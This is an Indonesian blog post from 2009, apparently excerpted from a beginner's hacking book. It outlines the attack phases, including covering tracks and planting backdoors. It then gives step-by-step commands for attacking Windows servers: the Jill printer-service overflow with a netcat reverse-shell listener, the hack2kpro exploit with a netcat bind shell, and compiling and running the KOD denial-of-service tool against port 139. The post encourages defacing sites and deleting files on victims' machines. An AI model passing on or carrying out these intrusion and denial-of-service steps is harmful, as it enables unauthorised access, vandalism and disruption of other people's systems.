Pembahasan internet hacking pada buku ini dilakukan melalui sistem operasi Linux. Jadi, jika Anda termasuk 'pemula'
dalam menggunakan Linux. Minimal, Anda harus bisa dan terbiasa menggunakan sintaks perintah seperti berikut ini:
- awk
- mail
- mknod
- more
- mount
- ping
- ps
- sed
- sort
- tar
- ifconfig
- ipfwadm
- last
- head
- tail
- gcc
- cut
- find
- ftp
- less
- vim
- nc (netcat)
- rcp
- xhost
- xterm
- syslogd
- inetd
- telnet
- ssh
- finger
- cat
- chmod
- dd
- grep
- gzip
- kill
- ln
- ls
Beberapa tahapan hacking yang harus dilakukan, meliputi:
- Footprinting Mencari rincian informasi terhadap sistem-sistem untuk dijadikan sasaran, mencakup pencarian informasi
dengan search engine, whois, dan DNS zone transfer.
- Scanning Terhadap sasaran tertentu dicari pintu masuk yang paling mungkin. Digunakan ping sweep dan port scan.
- Enumeration Analisa intensif terhadap sasaran, yang mencari user account absah, network resource and share, dan
aplikasi untuk mendapatkan mana yang proteksinya lemah.
- Gaining Access Mendapatkan data lebih banyak lagi untuk mulai mencoba mengakses sasaran. Meliputi mengintip
dan merampas password, menebak password, serta melakukan buffer overflow.
- Escalating Privilege Bila baru mendapatkan user password di tahap sebelumnya, di tahap ini diusahakan mendapat
privilese admin jaringan dengan password cracking atau exploit sejenis getadmin, sechole, atau lc_messages.
- Pilfering Proses pengumpulan informasi dimulai lagi untuk mengidentifikasi mekanisme untuk mendapatkan akses ke
trusted sistem. Mencakup evaluasi trust dan pencarian cleartext password di registry, config file, dan user data.
- Covering Tracks Begitu diperoleh kendali penuh terhadap sistem, maka menutup jejak menjadi prioritas. Proses
menutupi jejak meliputi, pembersihan network log dan penggunaan hide tool seperti macam-macam rootkit dan file
streaming.
- Creating Backdoors Pintu belakang diciptakan pada berbagai bagian dari sistem untuk memudahkan masuk kembali
ke sistem ini dengan cara membentuk user account palsu, menjadwalkan batch job, mengubah startup file, menanamkan
servis pengendali jarak jauh serta monitoring tool, dan menggantikan aplikasi dengan trojan.
- Denial of Service Bila semua usaha di atas gagal, penyerang dapat melumpuhkan sasaran sebagai usaha terakhir.
Meliputi SYN flood, teknik-teknik ICMP, Supernuke, land/latierra, teardrop, bonk, newtear, trincoo, smurf, dan lain-lain.
Sekarang, mari kita coba bersama-sama belajar internet hacking
Menyerang server Windows dengan Jill
Pada saat jill pertamakali di postingkan oleh kelompok yang menamakan dirinya Dark Spyrit di bugtraq, jill cukup
membuat bencana yang cukup besar bagi para pengguna Windows 2000 Server. Banyak situs telah di jebol oleh para
script kiddies dengan menggunakan tools ini.
Jill melakukan exploitasi lubang keamanan pada Windows 2000 Server dengan memanfaatkan overflow pada service
printer, untuk mendapatkan akses DOS prompt (CMD.EXE) pada komputer yang diserang tersebut.
Ada cerita menarik pada saat Jill dipublikasikan pertama kali, saat itu Microsoft selaku vendor Windows 2000 Server
tidak segera merespon keberadaan Jill ini selama hampir 2 minggu. Oleh karena itu, semua server di dunia yang
terkoneksi melalui internet dengan berbasiskan Windows 2000 Server, cukup kalangkabut dan beberapa diantara
mereka mematikan servernya selama belum ada bugfix dari Microsoft tersebut. Ini tentunya berbeda dengan sistem
opensource, dimana waktu keluarnya patch dihitung dari saat bug muncul hanya memakan waktu beberapa hari, bahkan
bisa hanya beberapa jam saja.
Berikut ini adalah tahapan dalam penggunaan program ini:
- Jalankan program nc (net cat), adapun sintaks perintahnya sebagai berikut: [root@dir:~] # nc -l -p (nomor port kita) -vv
Misalnya, kita menggunakan port 12345 untuk menjalankan prompt, ketikkan perintah sebagai berikut: [root@dir:~] #
nc -l -p 12345 -vv [Enter]
Tunggu sampai muncul tampilan sebagai berikut: listening on [any] 12345 ...
- Jalankan Jill di konsole baru tersebut dengan syntax sebagai berikut : [root@dir:~] # jill [ip_address_korban]
[nomer_port_korban] [ip_address_kita]
[port_kita]
Misalnya, kita serang komputer korban (ip 192.168.0.2 dan port 80), sedangkan komputer kita mempunyai ip
192.168.0.1 dan kita sudah membuka port nomer 12345 sebagai kanal komunikasi Jill, maka syntax-nya sebagai berikut:
[root@dir:~] # jill 192.168.0.2 80 192.168.0.1 12345
- Anda kembali lagi pada konsole Anda yang menjalankan nc
- Jika target adalah Windows 2000 Server yang belum di-patch, maka pada kanal nc tersebut akan muncul prompt
Windows 2000.
- Setelah itu Anda bisa melakukan apa saja di sini, termasuk diantaranya mengubah tampilan web atau bahkan
menghapus file-file di harddisk :).
Menyerang server Windows denganhackw2k
Pihak Microsoft mengumumkan adanya hole atau celah keamanan yang menimpa salah satu produknya, Windows
2000 Pro. Dimana hole atau celah keamanan ini memiliki peringkat 'high risk', sehingga bisa mengakibatkan resiko yang
fatal bagi penggunanya.Microsoft menghimbau penggunanya untuk segera melakukan update patch.
Celah ini tidak menutup kemungkinan, juga terjadi pada produk Microsoft lainnya, seperti: Windows ME, Windows XP,
Windows 2000 dan 2003.
Berikut ini adalah tahapan dalam penggunaan program ini:
- Jalankan program nc (net cat), adapun sintaks perintahnya sebagai berikut: [root@dir:~] # hack2kpro [alamat-ipsasaran]
[nomor-port]
Misalnya, kita menggunakan port 3003 untuk menjalankan prompt, ketikkan perintah sebagai berikut: [root@dir:~] #
hack2kpro 192.168.0.1 3003
Tunggu sampai muncul tampilan sebagai berikut:
-
-
Kemudian, tekan [Ctrl+C]
- Lanjutkan dengan mengetikkan sintaks perintah netcat berikut ini: [root@dir:~] # nc 192.168.0.1 3003
- Jika target adalah Windows 2000 Server yang belum di-patch, maka pada kanal nc tersebut akan muncul prompt
Windows 2000. Seperti pada contoh gambar berikut ini:
- Setelah itu Anda bisa melakukan apa saja di sini, termasuk diantaranya mengubah tampilan web atau bahkan
menghapus file-file di harddisk yang bersangkutan :).
Menyerang server Windows dengan KOD
KOD atau kepanjangan dari Kiss Of Death adalah semacam tool yang digunakan untuk menyerang Windows pada port
default 139. Fungsi dari kod adalah membuat komputer terget menjadi " hang /blue screen". Kod sendiri ada suatu file
mentah dalam bentuk bahasa C. Pada pembahasan ini kami akan menerangkan bagaimana caranya kita akan mencompile
kod lalu bagai mana cara menjalankannya dan yang terakhir bagaimana hasil dari kod.
- Pertama kali yang harus kita lakukan adalah melakukan download file kod.c. Anda dapat mencarinya di search engine
atau di ftp.technotronic.com.
- Setelah Anda download, yang harus Anda lakukan selanjutnya adalah mengkompilasinya, sebelumnya kod.c hanya
berjalan di komputer dengan sistem operasi Unix/Linux. Selanjutnya Anda bisa mengompilasi file kod.c sebagai berikut :
[root@dir:~] # gcc -o kod kod.c
Untuk lebih mudahnya, kami sudah menyertakan file kod dalam bentuk jadi pada masaji-slax.
Cara penggunaannya cukup mudah, Anda tinggal ketikkan: [root@dir:~] # kod [no_ip] -p [nomor port] -t [hits]
Pertama kita cari dulu targetnya setelah ditemukan kita scan port dulu karena kita harus tahu port apa saja yang
dijalankan oleh target kita selanjutnya jika sudah diketahui maka kita bisa mencobanya. Sebagai contoh kita ambil port
139 yaitu merupakan port dari service yang dijalankan oleh Windows9.x namanya netbios-ssn. Dampak serangan bagi
port ini adalah menghambat atau mencegat semua packet yang akan keluar atau masuk dan dalam hal ini jika komputer
target sedang dalam kondisi online maka komputer tersebut tidak dapat browsing/surfing. Cara untuk mengatasi
serangan ini jika sudah terjadi adalah restart komputer. Perhatikan contoh gambar berikut :
Kelemahan pada kod ini adalah, tidak semuanya berhasil. Tergantung pada jaringan komputernya jika Anda
melakukannya pada Local Area Network (LAN) di sini. Maksud kami adalah Anda memiliki 2 buah komputer yang saling
berhubungan maka kemungikan besar dapat berhasil tetapi jika target berada di luar sasaran artinya kita harus
terhubung dengan jaringan internet dahulu ada beberapa hal yang harus diperhatikan kita berhasil atau tidak :
- Komputer target terhubung dengan internet dan komputer tersebut tidak memiliki jaringan LAN dan system yang
dijalankan Windows9x/ME di sini kita mungkin bisa berhasil.
- Komputer terget memiliki sebuah server, dan client menggunakan Windows9x/ME disini kemungkinan berhasilnya fiftyfifty
karena packet serangan kita terkadang difilter oleh server.
- Komputer target memiliki server yang memiliki firewall dan client menjalankan Windows9x/NT/ME disini ada
kemungkinan berhasil sangat kecil sekali karena sangat banyak kemungkinannya diantaranya adalah client
menggunakan WinNT dan sudah di patch atau diberi security maka sangat susah sekali ditembus kedua Windows9x ada
kemungkinan berhasil jika firewall di server tidak memblokir port 139 tadi.
Kod sebenarnya disebabkan oleh Proses dari proses igmp packet untuk Window tidak tertulis secara benar. Kod
membuat Blue Screen pada Windows 98/98 SE dan membunuh TCP stack. Ketika pengguna komputer menggunakan
komputer yang telah diserang oleh kod ini dia tetap bisa melakukan aktivitasnya tetapi tidak ada lagi TCP stack. Packet
yang ditulis oleh user akan dikirimkan tetapi tidak akan menerima jawaban. Contoh untuk situasi seperti ini adalah jika
Anda melakukan perintah ping terhadap suatu address maka icmp echo request akan di kirimkan tetapi icmp echo
replies tidak akan mengirimkan jawaban kembali. Solusi untuk para pengguna komputer yang menggunakan modem
sebagai alat koneksi ke internet adalah memutuskan hubungan internet dan menyambungkan/connect kembali. Dan
untuk pengguna komputer yang posisi jaringan komputernya adalah melalui LAN maka komputer tersebut harus
direstart.
Senin, 27 Juli 2009
Hacking Bagi Pemula 11
Posted by endhika on Senin, 27 Juli 2009
Previous
« Prev Post
« Prev Post
Next
Next Post »
Next Post »
Langganan:
Posting Komentar (Atom)
Tidak ada komentar:
Posting Komentar